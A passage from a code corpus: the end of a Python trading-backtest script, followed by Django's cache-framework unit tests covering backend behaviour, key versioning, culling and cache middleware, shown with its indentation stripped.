df_tradelist_full.loc[s_index, 'contract_2'] != df_tradelist_full.loc[s_lastindex, 'contract_2']:
print(i_row)
df_tradelist_full.iloc[i_begin:i_row,:].to_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(counter)+".csv")
counter += 1
i_begin = i_row
df_tradelist_full.iloc[i_begin:,:].to_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(counter)+".csv")
multipleBT = WtMultipleBacktest(worker_num=8)
multipleBT.go(counter = counter, interval=0.2)
analyst = WtBtAnalyst()
for i_count in range(counter+1):
s_name = 'hft_sp_2contracts_multiple_' + str(i_count)
analyst.add_strategy(s_name, folder="./outputs_bt/" +s_name +"/", init_capital=500000, rf=0.02, annual_trading_days=240)
analyst.run_multiple(outname='bt_backtest')
kw = input('press any key to exit\n')
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.core.context_processors import csrf
from django.db import connection, connections, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
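# Illustrative sketch (not part of the original tests): how the merge order
# described above plays out for one alias. The base config here is an arbitrary
# example and the helper name is hypothetical.
def _caches_setting_for_tests_example():
    base = {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}
    setting = caches_setting_for_tests(base=base, TIMEOUT=30)
    # setting['v2'] is now:
    #   {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
    #    'VERSION': 2, 'TIMEOUT': 30}
    # i.e. the per-alias entry from _caches_setting_base and the keyword
    # overrides are layered on top of the shared base config.
    return setting['v2']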
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
        Passing None as the timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
        Passing 0 as the timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
